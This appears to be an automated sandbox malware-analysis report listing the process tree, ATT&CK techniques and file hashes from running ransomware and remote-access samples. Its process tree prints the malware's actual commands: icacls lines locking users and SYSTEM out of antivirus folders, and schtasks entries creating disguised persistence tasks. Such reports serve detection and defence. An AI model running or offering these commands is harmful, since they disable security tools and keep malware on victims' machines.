C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:5828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3392
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:5192
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:3496
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:872
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:5992
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4528 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵PID:448
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:5380
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:2960
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵PID:2804
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵PID:5220
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:5980
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:4548
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:3028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5584
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:2500
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵PID:5444
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:5264 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵PID:3124
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:2296 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:5660
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵PID:800
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:3532 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵PID:2260
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:1072
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵PID:6000
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵PID:5700
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5304
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵PID:3392
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2332
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵PID:1704
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5708
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 13⤵
- Scheduled Task/Job: Scheduled Task
PID:5660
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4788
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7652 /prefetch:12⤵PID:1704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7088 /prefetch:82⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8008 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:12⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7356 /prefetch:82⤵PID:4904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8132 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:1072
-
-
C:\Users\Admin\Downloads\WinNuke.98.exe"C:\Users\Admin\Downloads\WinNuke.98.exe"2⤵
- Executes dropped EXE
PID:2144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:12⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4076 /prefetch:82⤵PID:2864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8132 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:4364
-
-
C:\Users\Admin\Downloads\$uckyLocker.exe"C:\Users\Admin\Downloads\$uckyLocker.exe"2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:12⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7324 /prefetch:82⤵PID:3552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7188 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:1200
-
-
C:\Users\Admin\Downloads\CryptoLocker.exe"C:\Users\Admin\Downloads\CryptoLocker.exe"2⤵
- Executes dropped EXE
- NTFS ADS
PID:5304 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\CryptoLocker.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5272 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w000002344⤵
- Executes dropped EXE
PID:5456
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4892
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1136
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004C01⤵PID:6044
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1212 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
PID:5236 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:5320
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3176 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
PID:4880 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:2292
-
-
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5284 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
PID:3388 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:5816
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:4776
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5288 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
PID:5768 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3124
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2576
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:4708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
PID:5600
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:784
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:1280
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:3884
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5828
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:5336
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:2588
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:4144
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:872
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:1104
-
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:3648
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:200
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:6012
Network
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter: 2
- PowerShell: 1
- Scheduled Task/Job: 1
- Scheduled Task: 1
- Scripting: 1
- System Services: 1
- Service Execution: 1

Persistence
- Account Manipulation: 1
- Boot or Logon Autostart Execution: 3
- Registry Run Keys / Startup Folder: 1
- Winlogon Helper DLL: 2
- Create or Modify System Process: 3
- Windows Service: 3
- Event Triggered Execution: 1
- Netsh Helper DLL: 1
- Scheduled Task/Job: 1
- Scheduled Task: 1
- Server Software Component: 1
- Terminal Services DLL: 1

Privilege Escalation
- Abuse Elevation Control Mechanism: 1
- Bypass User Account Control: 1
- Account Manipulation: 1
- Boot or Logon Autostart Execution: 3
- Registry Run Keys / Startup Folder: 1
- Winlogon Helper DLL: 2
- Create or Modify System Process: 3
- Windows Service: 3
- Event Triggered Execution: 1
- Netsh Helper DLL: 1
- Scheduled Task/Job: 1
- Scheduled Task: 1

Defense Evasion
- Abuse Elevation Control Mechanism: 1
- Bypass User Account Control: 1
- File and Directory Permissions Modification: 1
- Hide Artifacts: 4
- Hidden Files and Directories: 3
- Hidden Users: 1
- Impair Defenses: 5
- Disable or Modify System Firewall: 1
- Disable or Modify Tools: 3
- Indicator Removal: 1
- Clear Persistence: 1
- Modify Registry: 9
- Scripting: 1
- Subvert Trust Controls: 1
- SIP and Trust Provider Hijacking: 1
Downloads
SHA256b7b963d340ca6f5e2f71c8725c395621538dd6643ba59c8e4fc8414a66915dd1
SHA512ec9a232c7466310c652db7905cc7c53a77f08fa11ecc95a05c3aa12c66c8b8b782693ffbe53f22cbb97a49150f1223eb962e29507cd84a2ae90067bc80ce7069
-
Filesize
6KB
MD51ba08bebc209cc53ab613fadae390ed9
SHA186aa0d27cf30ca7fdaa125a4574e77e6883a3982
SHA256a9fb0566db7b529b20047e58915b20cb48bda50e70cf31412da6c547fc394959
SHA51219f5c1510addff5b42e5a7d2d1af14a7b84c6b88403491873adb9e05527aba085226a3e74504b91bc1d6b6f74b32910fce67403b893254e4e9221a7615d78254
-
Filesize
8KB
MD53b24c3e81091f1699b4f4c87de1815d2
SHA1a22596be5880cfb702a856bb65dfea36399f24d4
SHA2566f1691a69b2690deb158c5280c30e9d853b6efb87d3f1be37e703d5b3c039509
SHA512e8e892b8615fca437dc9866924049d6d8269a670de12e8bd4590cd429ce74eea6a838be3d59ef143b96bdb0260208d1d87a5f54f8d73cd682c2a58fe42a139d5
-
Filesize
10KB
MD51ac28e9c1c900435290a23658e502875
SHA16806ce14ba7b17e7213aab3efd33e31c7af21653
SHA2569637bc8e536662f6c079f27e639eef5f5b3618813b0d0a8e78ffefa81cc1c613
SHA51253783752f5767010bda5eaab1edc5f9d22110bc5f97955665fd52ef23bd64248a8ebf19c07629974bb6651d19bfcf06001538c4a434441293082dd7076c8423c
-
Filesize
6KB
MD52d845746afd6cd1e552aa3a2730895e6
SHA1b175f6ccb15dedf82d4419f076f3b95799b06dff
SHA2567370d1acdd616a7569c0b05a7d2c0d2afe634fafd08f4486b9ee06bfb74bb900
SHA5126e11c5d841c634ce05a4391640a7e4c615e5f082ca612f630c43ff3eb48a287cd8c6150aae99709bd1fcd01e199746aa5297eb7d4528e876a038412d7b1ed608
-
Filesize
9KB
MD522d750f18e9eff897208970516b5653f
SHA1c9bfbb19079c949da378c1ed9eee709a3668c432
SHA25605d8e3bc657c22e733512de93bc2e31869a3d4ecf67955f8b43cf4f45f499c33
SHA51205f0ff550457f085149b97235144317ebbd659dc5b1e53325f6b1b178784dc880ad5fe375e5d8b4fb6d27ff9df93c6955a29f9f5a647957f4a9dc2394e201b1a
-
Filesize
6KB
MD54d27f39e99dc7140e95a7aca1c6feeee
SHA19f64526c41ec2649eb9100695e55ff9d0a538e73
SHA256a1d25ec752092db3aa2b39295f266dbfdce88cc498757138e1c0d4f1a747baa6
SHA5121bdb60f1ecd45ff53fc166ff46b29442e15cb524c423e5ea5d716370e36759792bbd659be5b305bf8a495224d1d31002f2d59d4c7a26c39465bd0cb5b232f53c
-
Filesize
6KB
MD5461bd965de6e9be0827f1b0f5d3eb95b
SHA1ba1721ced02a49fc7d741ed33cc8b4280422603d
SHA2568a704cb866bf29016a199af993aa250b1719918fbaaa15bec7eb969825747e8b
SHA512e19112e405d43139fcc0f12141d4e3dccfc6076ccd3b19d2d50939f8b4722a662f44033460d2ed493e95f7dc9f5640f2cdf1f90bff1289d815f983aeb211f65f
-
Filesize
10KB
MD5d6eb18c670f997ad0334e552b9a82922
SHA14091734f2f46b408c05d2d9efc1ca4e8592a2e41
SHA25684ce4876936b71a59e6b0ab899f957a157377d5d08422c130cc18e2a80fe16ef
SHA512e59e942e192cfb458404ba90e1459940ff2494b0d173ae58b3fe1721fcd78deb47f559f5631b1ebd1172d3174e975b508a73f232bc0c5f452561d0bc0fb6503e
-
Filesize
7KB
MD5a25fe975aa32ad8d1822f79e0cb8e475
SHA18f154f46cd775d0267253a1a9ca5ea2ec07997c7
SHA2565cdd9a26982b502ca5e2a0425b6b63c5e90c3536865d6c9b7beee2b76e78d800
SHA5121dafc4e8c956569a7eed5d3b5b90f764a17d18d3251c582ad38cb617b5f744424991b7f389e9d1216b048f323154d6cca6d2405e62192096810a47a7094996d7
-
Filesize
10KB
MD5b6b37a32ac0ac1046fa9d66556d8ac63
SHA180fb0e1330c7f152ad6b11b19ec0f629334966d0
SHA256860af2f067b95c46036e97d3fbed0d46f189ef9b20105bc6baa5008e07e3dd33
SHA512664be96172a9d2e5200f190259c75a7671321d9446a460343e862a620a3f4d3f22b1ede8c3d50a14c47fce4da9d9446cbf3b9beef2a2d89c8519992caca9645a
-
Filesize
36KB
MD561b2eebe00f59fec1a3f81ca700f5949
SHA19357220fbd076f42fe0d96903ad5910bd910b76a
SHA2560d937e51deb9554b5d0451a7f4c674f9aee4d2a8120577064f8eadcb2c873271
SHA5125d16c868436908b95226118200f020bff83178ada4e8ad485e89e37f605635ec844d827503e99382ef5c95dbcc180003551e36dc14b9ec68fe19cb20ab4c6b0c
-
Filesize
873B
MD56b5fceeb37ccbca94e8028a9d86c99f9
SHA1f5d88b359276d39d2513da485fd36becef04d5aa
SHA2567af676e1cd30d0f54add2a312a4970da3d87e151a0768715ab46bc4a4480067f
SHA512bf2f5ed9177a8e69ff095d6951c297f933dce91e8a3d214d3121096f71d6a79fcc199cfd07fc616d5a515ae9e804d0255e146c5839b3e8cf7f1ff2d4be32c0de
-
Filesize
297B
MD5fb7ddf66f858dc81140d2ed2e34577dd
